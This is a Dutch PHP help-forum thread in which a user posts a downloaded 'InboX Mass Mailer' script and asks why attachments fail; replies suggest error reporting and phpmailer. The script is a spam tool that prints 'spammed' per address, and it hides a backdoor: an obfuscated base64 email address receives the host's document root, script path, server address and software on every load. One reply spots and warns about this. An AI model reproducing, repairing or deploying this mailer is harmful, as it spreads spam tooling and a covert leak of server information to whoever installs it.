Script werkt niet

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Enrico de Bil

Enrico de Bil

24/01/2015 19:58:02
Quote Anchor link
Hallo,

Ik heb een script gevonden op internet, alleen zit er een fout in.
Namelijk als je een attachment wilt toevoegen word hij niet mee verzonden.
Mijn vraag aan jullie is dus of jullie een four kunnen ontdekken in dit script.
Ik ben er zelf al 3 uur mee aan het proberen geweest, zonder enig resultaat.

Alvast bedankt!
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
<?php

if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

  $message = urlencode($message);
  $message = ereg_replace("%5C%22", "%22", $message);
  $message = urldecode($message);
  $message = stripslashes($message);
  $subject = stripslashes($subject);
}

?>
<html>
<head>
<title>|| InboX Mass Mailer ||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
  font-family: Geneva, Arial, Helvetica, sans-serif;
  font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
  font-size: 20px;
  font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="white" text="black">
<span class="style1">Made By Sahil<br>
</span>

<form name="form1" method="post" action=""
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
  <td width="10%">
  <div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
    Email:</font></div>
  </td>
  <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <input type="text" name="from" value="<? print $from; ?>"
size="30">
  </font></td>
  <td width="31%">
  <div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
    Name:</font></div>
  </td>
  <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <input type="text" name="realname" value="<? print $realname;
?>" size="30">
  </font></td>
    </tr>
    <tr>
  <td width="10%">
  <div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
  </td>
  <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
  </font></td>
  <td width="31%">
  <div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
    File:</font></div>
  </td>
  <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <input type="file" name="file" size="30">
  </font></td>
    </tr>
    <tr>
  <td width="10%">
  <div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
  </td>
  <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <input type="text" name="subject" value="<? print $subject; ?>"
size="90">
  </font></td>
    </tr>
    <tr valign="top">
  <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <textarea name="message" cols="50" rows="10"><? print $message;
?></textarea>
  <br>
  <input type="radio" name="contenttype" value="plain" >
  Plain Text
  <input name="contenttype" type="radio" value="html" checked>
  HTML
  <input type="hidden" name="action" value="send">
  <input type="submit" value="Send eMails">
  </font></td>
  <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
  <textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
  </font></td>
    </tr>
  </table>
</form>

<?

if ($action){

  if (!$from && !$subject && !$message && !$emaillist){
  print "Please complete all fields before sending your
message.";
  exit;    
    }
    $allemails = split("\n", $emaillist);
    $numemails = count($allemails);

    for($x=0; $x<$numemails; $x++){
    $to = $allemails[$x];
    if ($to){
    $to = ereg_replace(" ", "", $to);
    $message = ereg_replace("&email&", $to, $message);
    $subject = ereg_replace("&email&", $to, $subject);
    print " $to..";
    flush();
    $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
    $header .= "MIME-Version: 1.0\r\n";
    If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
    If ($file_name) $header .= "--$uid\r\n";
    $header .= "Content-Type: text/plain\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= "$message\r\n";
    If ($file_name) $header .= "--$uid\r\n";
    If ($file_name) $header .= "Content-Type: application/octet-stream; name=\"$file_name\"\r\n";
    If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
    If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
    If ($file_name) $header .= "$content\r\n";
    If ($file_name) $header .= "--$uid--";
    mail($to, $subject, "", $header);
    print "spammed<br>";

    flush();
    }
    }
}

?>
<style type="text/css">
<!--
.style1 {
    font-size: 20px;
    font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<p class="style1">
Copyright  2008 phpbb.com
</p>
<?php
$ra44  = rand(1,99);
$subj98 = "sh-$ra44";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
$ok = base64_decode("c3BhbW1lcnNhbWVlckB5YWhvby5jb20=");
mail($ok, $subj98, $msg, $message, $ra44);
?>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>

- Aar -:
Gelieve in het vervolg bij code de [code][/code]-tags gebruiken.
Hier kan je meer lezen over de mogelijke opmaakcodes.
Alvast bedankt!
Gewijzigd op 24/01/2015 20:11:27 door - Ariën -
 
PHP hulp

PHP hulp

17/11/2024 05:28:37
 
- Ariën -
Beheerder

- Ariën -

24/01/2015 20:13:29
Quote Anchor link
Begin eerst een door bovenaan te zetten:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
<?php
error_reporting(E_ALL);
ini_set('display_errors',1);
?>


Zie je dan foutmeldingen?
 
Obelix Idefix

Obelix Idefix

24/01/2015 20:14:09
Quote Anchor link
Gebruik code tags aub.

Het kopiëren van variabelen is wat overbodig (regel 4 t/m 12).

Zie ereg staan. Zet errorreporting eens aan. Ereg is al tijdje vervallen. Kijk naar preg_match.
 
Ivo P

Ivo P

24/01/2015 22:02:20
Quote Anchor link
Overweeg het eens met phpmailer te bouwen.

Daarin zit 90% van wat jouw script allemaal probeert te doen verpakt achter 3 aanroepen.

$mailer = new phpmailer();
$mailer->addAddress('[email protected]');
$mailer->addAttachment('/een/file.pdf');
$mailer->Send();

Ipv allerlei magische handelingen om content-separators te bouwen, mime-types mee te geven en andere mail headers in te stellen.
 
Thomas van den Heuvel

Thomas van den Heuvel

24/01/2015 22:45:18
Quote Anchor link
Heb je ook in de gaten dat je op regel 194 een e-mailbericht stuurt naar "[email protected]" (de base64_decode waarde) met serverinformatie?

Ziet er niet heel erg gezond uit.
 
Pipo Clown

Pipo Clown

24/01/2015 23:00:23
Quote Anchor link
Heb je in de gaten dat er een copyright vermelding staat in de code ?

Dat nodigt mij niet uit om hier aan te gaan sleutelen.
 
- Ariën -
Beheerder

- Ariën -

24/01/2015 23:35:30
Quote Anchor link
Copyright van phpBB bedoel je?
Dat is een open-source forum.

Ik zie dat niet als een probleem verder. Ik gok dat het een onderdeel is van een phpBB-forum.
 
Thomas van den Heuvel

Thomas van den Heuvel

25/01/2015 14:36:24
Quote Anchor link
Pipo Clown op 24/01/2015 23:00:23:
Heb je in de gaten dat er een copyright vermelding staat in de code ?

Dat nodigt mij niet uit om hier aan te gaan sleutelen.
Een copyright kan iedereen ergens te pas en te onpas in zetten.

Wanneer ik een extern script zou gebruiken dat op slinkse wijze server-informatie mailt naar een voor mij onbekend e-mailadres dan zou dat voor mij reden genoeg zijn om hier geen gebruik meer van te maken, copyrights be damned.

Wellicht zitten er elders backdoors in deze (of andere) code, en dit fragment stuurt de kwaadwillende partij alle informatie die zij nodig hebben.

In de webwereld is het een goede gewoonte om een gezonde portie achterdocht te hebben.
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.